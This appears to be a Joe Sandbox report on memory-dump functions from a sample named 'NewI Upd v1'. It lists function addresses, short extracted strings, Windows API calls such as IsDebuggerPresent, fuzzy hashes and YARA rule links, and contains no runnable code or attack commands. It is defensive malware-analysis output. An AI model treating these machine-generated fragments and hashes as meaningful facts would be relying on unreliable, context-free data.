Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: !$%R.P$690213190D2228369D923F913F8AA6F7$<^-\$=):<$Wd_h$o\YZ
API String ID: 0-128471998
Opcode ID: a8a60f1c94ef2cb0f82f3ebe1d3bbb7747837e10c975e72afa211e211b85bc91
Instruction ID: ea466127d3427ea8260b03010496f31bf6f3bb086989d147bd569282d8e95738
Opcode Fuzzy Hash: a8a60f1c94ef2cb0f82f3ebe1d3bbb7747837e10c975e72afa211e211b85bc91
Instruction Fuzzy Hash: F5D155716483408BD314DF75C8916ABBBE2EBC1304F08493DE4D59B392D778D90ACB96

Function 00419FC0 Relevance: 8.7, Strings: 6, Instructions: 1197COMMON

Download Yara Rule

Strings

wvut, xrefs: 0041A475
X-d, xrefs: 0041A346
01, xrefs: 0041A3EB
wvut, xrefs: 0041AC72
wvut, xrefs: 00419FF5
r-d, xrefs: 0041A317

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: 01$X-d$r-d$wvut$wvut$wvut
API String ID: 2994545307-832908049
Opcode ID: 48252b346197013ab87d6c2eea2e04574c02d7b0adccc7b8b212ce9ec982b9fc
Instruction ID: 058fb72e89f1b760c447db5e870baf2167253f75a0d269a07b6e1ee1b62b50d5
Opcode Fuzzy Hash: 48252b346197013ab87d6c2eea2e04574c02d7b0adccc7b8b212ce9ec982b9fc
Instruction Fuzzy Hash: 6082063460A3406FD7118F24D8817ABBBE2EBD6714F28882EE4C547392D679DC95CB4B

Function 00427540 Relevance: 8.2, Strings: 6, Instructions: 657COMMON

Download Yara Rule

Strings

x~, xrefs: 00427DE6
|r, xrefs: 00427DF1
[X, xrefs: 00427E3E
FBDr, xrefs: 00427652
UU~/, xrefs: 00427660
nol, xrefs: 0042758C

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: FBDr$UU~/$[X$nol$x~$|r
API String ID: 0-2561386150
Opcode ID: e540fb6e670f536f0ba995a4d10c67065d39990fca980b977c0ace72e65ef309
Instruction ID: 6f34dedc997c3ba296ef7fd38ef9b93767032c9962313fb9ab88f0cd06fb20b9
Opcode Fuzzy Hash: e540fb6e670f536f0ba995a4d10c67065d39990fca980b977c0ace72e65ef309
Instruction Fuzzy Hash: F72255B5E04225CFCB24DF69E8413AFBBB1EF46304F19846DD486AB341D7389906CB99

Function 00427520 Relevance: 8.1, Strings: 6, Instructions: 645COMMON

Download Yara Rule

Strings

wvut, xrefs: 0042813F
x~, xrefs: 00427DE6
|r, xrefs: 00427DF1
[U, xrefs: 00427C4C
[X, xrefs: 00427E3E
_Y, xrefs: 00427C41

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: [X$wvut$[U$_Y$x~$|r
API String ID: 0-1702839061
Opcode ID: bab7f4f8407b1c6ab052c34850c08ebca3260780f6b47d6b3057e3a4f89dc308
Instruction ID: abafa73712f680908ded728f56e723c7fd967ba4ce1dbf73b572470a5cd9e859
Opcode Fuzzy Hash: bab7f4f8407b1c6ab052c34850c08ebca3260780f6b47d6b3057e3a4f89dc308
Instruction Fuzzy Hash: 2B122AB6A083548BD7249F29DC4176BB7E2EFD5314F09892DD8999B382DB349801CB86

Function 00419981 Relevance: 7.7, Strings: 6, Instructions: 242COMMON

Download Yara Rule

Strings

}Ayz, xrefs: 004198F1
EyAB, xrefs: 004198DB
fI, xrefs: 00419907
LK^U, xrefs: 00419956, 00419834, 0041995D, 00419B7B
jhn}, xrefs: 004198FC
$%, xrefs: 004199F0

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: $%$EyAB$LK^U$fI$jhn}$}Ayz
API String ID: 0-2370480214
Opcode ID: 250d52b7a2d9a4048c4baa1f888b06f5f24d713bfc3508c1bddfe1a7033dff46
Instruction ID: 018c1efd376704d7594dfbe1329c173c14b603551474b852f2f97e26f70e4076
Opcode Fuzzy Hash: 250d52b7a2d9a4048c4baa1f888b06f5f24d713bfc3508c1bddfe1a7033dff46
Instruction Fuzzy Hash: 75712575A183809FD7309F2598563ABB3A6EF83314F19093DD4C94B362EB384985C75B

Function 00637500 Relevance: 7.5, Strings: 5, Instructions: 1276COMMON

Download Yara Rule

Strings

seX8, xrefs: 006377DD
Huj, xrefs: 00638213, 006383AD
>=+t, xrefs: 0063777D
%, xrefs: 00637967
:, xrefs: 00637575

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: %$>=+t$Huj$seX8$:
API String ID: 0-2326394301
Opcode ID: 48ed91b5457a2a53132ad7e25a74be88aaf1906de303ccb1b3a74365b477332e
Instruction ID: 3f317c4887befe1693a6a56990b30d24a0141a477cd067198286a00fc510e86a
Opcode Fuzzy Hash: 48ed91b5457a2a53132ad7e25a74be88aaf1906de303ccb1b3a74365b477332e
Instruction Fuzzy Hash: 51C25572A01259CFCB04CFA9E9905EDBBF1FF58311F14826AE949E7291E3389A45CF50

Function 00415E7F Relevance: 6.7, Strings: 5, Instructions: 481COMMON

Download Yara Rule

Strings

7, xrefs: 00415F9E
wvut, xrefs: 00416175
wvut, xrefs: 00416405
*, xrefs: 00416323
gfff, xrefs: 00416050

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: *$7$gfff$wvut$wvut
API String ID: 0-1115614266
Opcode ID: 5acc399c9ae1919999839faf72870f617a4e1c369a62d689b89be54e0f9fcebc
Instruction ID: 19d800e31c10d0aaa58fc661620c393ea5f5fb0188774170dc17f33fc21253bc
Opcode Fuzzy Hash: 5acc399c9ae1919999839faf72870f617a4e1c369a62d689b89be54e0f9fcebc
Instruction Fuzzy Hash: 87E13A726087418BC718CF28D8517ABB7E2EBC5314F198A7DE48ADB391DB38D905CB46

Function 004192AB Relevance: 6.7, Strings: 5, Instructions: 455COMMON

Download Yara Rule

Strings

V&a), xrefs: 004192BA
L4, xrefs: 004193A0
Z&a), xrefs: 00419338
L4, xrefs: 00419690
wvut, xrefs: 00419365

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: V&a)$Z&a)$wvut$L4$L4
API String ID: 2994545307-2692662489
Opcode ID: 3f81ded276506ee1919fdcb18e38c98a24cc538433152c03b0ebcaab23a4e166
Instruction ID: 3a3d7920e5f28119da16de7cf853ee49e5b64c1050b927159352e8d60b2d9c6e
Opcode Fuzzy Hash: 3f81ded276506ee1919fdcb18e38c98a24cc538433152c03b0ebcaab23a4e166
Instruction Fuzzy Hash: 68D17C756083419FD714CF25D8A17AFB3D2BBD6318F14893DE49987291CB389C86CB4A

Function 00437FB0 Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

p, xrefs: 0043812E
_, xrefs: 00438138
v, xrefs: 004381C5
0, xrefs: 004380F7
Q, xrefs: 0043813D

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: 0$Q$_$p$v
API String ID: 0-636952703
Opcode ID: 0d3a3da1710a9b5b0d1e6dd9d27aa401f7c30f61325736059ea3f67ee05a21f0
Instruction ID: 0af557c47fccd54a1610aec0536577f4b9044c2212ef548513126a11b74d849e
Opcode Fuzzy Hash: 0d3a3da1710a9b5b0d1e6dd9d27aa401f7c30f61325736059ea3f67ee05a21f0
Instruction Fuzzy Hash: 3F71AF2210C7C18AD7518A3C489429BEFD24BE7234F2D9B9DE4F5873D2C52AC50A9767

Function 00418915 Relevance: 6.4, Strings: 5, Instructions: 162COMMON

Download Yara Rule

Strings

<0, xrefs: 00418AC0
8<, xrefs: 00418952
!!, xrefs: 0041893C
!9, xrefs: 00418947
lm, xrefs: 00418AB2

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: !!$!9$8<$<0$lm
API String ID: 0-329392658
Opcode ID: 7f0a8532f8baf5ac406c8a6587795f082fb309e973dda90e0c9024e64d50f2d9
Instruction ID: 75fa5aab44c1138973aa2edcd39388b7051be89b7ccf94615bbf86e1c3d6e53a
Opcode Fuzzy Hash: 7f0a8532f8baf5ac406c8a6587795f082fb309e973dda90e0c9024e64d50f2d9
Instruction Fuzzy Hash: F66142B55093808BD7748F25E8923EBBBE2EBC6314F548E2DD5CD4B244DB384582CB96

Function 0087D950 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0087D95B
IsDebuggerPresent.KERNEL32 ref: 0087DA2B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0087DA57
UnhandledExceptionFilter.KERNEL32(?), ref: 0087DA61

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 8a4f928dcdfbe0f63fdb419003b7f14d0cbcf9b1b717c462a31b5e858ff691c9
Instruction ID: 94e9375dff1c99f0ca191eb609bd6e8375be320b08ebd9affc4b474f1367971b
Opcode Fuzzy Hash: 8a4f928dcdfbe0f63fdb419003b7f14d0cbcf9b1b717c462a31b5e858ff691c9
Instruction Fuzzy Hash: E63117B8C043289AEB21DFA4D8497DDBBB4FF59304F0081E9E90CAA255E7718B85CF51

Function 0087D020 Relevance: 6.0, APIs: 4, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,0087D150,008AF190), ref: 0087D025
UnhandledExceptionFilter.KERNEL32(0087D150,?,0087D150,008AF190), ref: 0087D02F
GetCurrentProcess.KERNEL32(C0000409,?,0087D150,008AF190), ref: 0087D03A
TerminateProcess.KERNEL32(00000000,?,0087D150,008AF190), ref: 0087D041

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 13cc048287e515ba6a11083f92c25d98841856f501e70ee6f702015ec3794283
Instruction ID: 5f4bec9a8e89bed50ad3fbf76f813100237e56675364095fb8db964028134d18
Opcode Fuzzy Hash: 13cc048287e515ba6a11083f92c25d98841856f501e70ee6f702015ec3794283
Instruction Fuzzy Hash: 18D0C975400604EBE7102BE0FC0CA493B6CBB0A212F004420F709C2923DB3094409B79

Function 0042C6C1 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

UMQU, xrefs: 0042C6DA
SASt, xrefs: 0042C806
P]QS, xrefs: 0042C7FB
gD, xrefs: 0042C76D

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: P]QS$SASt$UMQU$gD
API String ID: 0-3700796039
Opcode ID: 3d6bbfbc5dcbb23a6ba540e773455c35fb51c230d6fcbebb5aa0a1b1154130ef
Instruction ID: 9078fd659d4e0eb8636bc0c374281540add951d8ccb964d43f516dd22269708b
Opcode Fuzzy Hash: 3d6bbfbc5dcbb23a6ba540e773455c35fb51c230d6fcbebb5aa0a1b1154130ef
Instruction Fuzzy Hash: 0C413C7150C3D28BD73A8F3594903EBBBE2AFD2304F98496DC0CE87241DB7948068B96

Function 004149F0 Relevance: 4.8, Strings: 3, Instructions: 1030COMMON

Download Yara Rule

Strings

D]+\, xrefs: 00415120
g%&, xrefs: 00414CC0, 00414CEE
g%&, xrefs: 00414D40

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: D]+\$g%&$g%&
API String ID: 0-2338581241
Opcode ID: 6856f4cabd4c67a98aceea986a7f3fbb80d58b34a128a02fdb570e4b7fd13515
Instruction ID: b521f69c2c6c4258ec1e4259d2c28972bdec312ee4aee09ee2eb01e097c526d3
Opcode Fuzzy Hash: 6856f4cabd4c67a98aceea986a7f3fbb80d58b34a128a02fdb570e4b7fd13515
Instruction Fuzzy Hash: AB523274608300DBD7049F28E852BBBB3A1FBC6314F24493DE481973A1E779AD55CB8A

Function 00896350 Relevance: 4.7, APIs: 3, Instructions: 238filetimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(00000000,?,4903A6BA), ref: 0089647B
std::_Timevec::_Timevec.LIBCPMTD ref: 00896488
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0089661D

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: FileFind$FirstNextTimevecTimevec::_std::_
String ID:
API String ID: 2141543823-0
Opcode ID: 9b5bf1a0db2c67db805d4d7b38b0cc6d93aa3c43ac5de9bf404b21dae31d74ea
Instruction ID: 1982d0124366fe6246d5fb46b0afb303f48899b65adbac9ea9488e2651de5f2b
Opcode Fuzzy Hash: 9b5bf1a0db2c67db805d4d7b38b0cc6d93aa3c43ac5de9bf404b21dae31d74ea
Instruction Fuzzy Hash: 31A15C719141299BDF64EF24CC99BAEB375FF54300F0842E9E40AA7291EB30AE95CF50

Function 00888EB0 Relevance: 4.6, APIs: 3, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00888FB0
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00888FBE
UnhandledExceptionFilter.KERNEL32(?), ref: 00888FCB

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 7622b709d96422fa06849f03eb6dc34f419608ea967592db0e96de7a850c3ab2
Instruction ID: 2bdf58f284241c387b4fa8e34473aaeba2b6cc00d654e69e6d1d9e6a18f1ac92
Opcode Fuzzy Hash: 7622b709d96422fa06849f03eb6dc34f419608ea967592db0e96de7a850c3ab2
Instruction Fuzzy Hash: C341D4B5811228DBCB25DF14D888799B7B4FF58310F5081EAE90DA6251EB709B85CF85

Function 0043C270 Relevance: 4.5, Strings: 3, Instructions: 788COMMON

Download Yara Rule

Strings

wvut, xrefs: 0043C440
f, xrefs: 0043C511
wvut, xrefs: 0043C2AC

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: f$wvut$wvut
API String ID: 2994545307-3535533560
Opcode ID: fd938245582a52d0a474a74229dff6de0110b49dd1fff8f6bdf2bacf65087a65
Instruction ID: 547d6ab43d9e2759475c5a4a20cb951543cabbcce3a1061a07729cac14ab1df5
Opcode Fuzzy Hash: fd938245582a52d0a474a74229dff6de0110b49dd1fff8f6bdf2bacf65087a65
Instruction Fuzzy Hash: F332E3716083519FC314CF29C8C1A2BBBE1BBC9314F18992EE899A7391D734EC058B96

Function 004392C0 Relevance: 4.3, Strings: 3, Instructions: 541COMMON

Download Yara Rule

Strings

wvut, xrefs: 00439359
wvut, xrefs: 00439549
wvut, xrefs: 00439820, 004394DE

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: wvut$wvut$wvut
API String ID: 2994545307-3074886881
Opcode ID: 9c5656d1e7269df25e1d60f0663955e7bf72f0f872a2082ba0aaf579741bba69
Instruction ID: e3840fc7e32e2140e7721e4039841628edb466aae30d20cf5835760600a8ea3e
Opcode Fuzzy Hash: 9c5656d1e7269df25e1d60f0663955e7bf72f0f872a2082ba0aaf579741bba69
Instruction Fuzzy Hash: 71E14672A083109FC714DF28DC8162FB7D6ABCD714F18952EE88597399D7B89C05C78A

Function 0063F160 Relevance: 4.3, Strings: 3, Instructions: 532COMMON

Download Yara Rule

Strings

@4e, xrefs: 0063F504, 0063F48C, 0063F582, 0063F59C, 0063F890, 0063F78A, 0063F29F, 0063F388, 0063F7FC, 0063F7C2, 0063F700, 0063F5DF, 0063F7FF, 0063F318, 0063F8E4, 0063F4D7, 0063F8DE, 0063F773, 0063F68D, 0063F434, 0063F5D5, 0063F2D2, 0063F312, 0063F739, 0063F611, 0063F858, 0063F75D
Huj, xrefs: 0063F403, 0063F475, 0063F83B
@4e, xrefs: 0063F1FC

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: @4e$@4e$Huj
API String ID: 0-2860049029
Opcode ID: ea4e67ee254ed8e14c6208e155b35f809e617f1c0dd6472ab57891514a68658a
Instruction ID: 0cf5ea1583696ca8395f0ef55bf448782fd535353ed9dc2fb7c0e96ac04bcce9
Opcode Fuzzy Hash: ea4e67ee254ed8e14c6208e155b35f809e617f1c0dd6472ab57891514a68658a
Instruction Fuzzy Hash: 14327935901249DFCB04CFA8E9905EDBBF1FF55310F14826AE995A73A2D338AA45CF90

Function 0041D190 Relevance: 4.2, Strings: 3, Instructions: 413COMMON

Download Yara Rule

Strings

tk,q, xrefs: 0041D286
KH, xrefs: 0041D4D0
v, xrefs: 0041D42A

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: v$KH$tk,q
API String ID: 0-629618436
Opcode ID: b2e22c629db1ccce8c18528958ff69c59247fbafbb21b66f2e60b66a8a00e2c4
Instruction ID: 245dd0edfbb020feb8fe387358ed0d23e4b2bcad34f524d102d31241e2f0ff17
Opcode Fuzzy Hash: b2e22c629db1ccce8c18528958ff69c59247fbafbb21b66f2e60b66a8a00e2c4
Instruction Fuzzy Hash: 02B1F0B49083118BD720DF29C8916ABB7F1EFD1314F189A1DE8D58B391E738D845C75A

Function 00416490 Relevance: 4.1, Strings: 3, Instructions: 325COMMON

Download Yara Rule

Strings

wvut, xrefs: 004165C5
wvut, xrefs: 004164B5
wvut, xrefs: 00416D95

Memory Dump Source

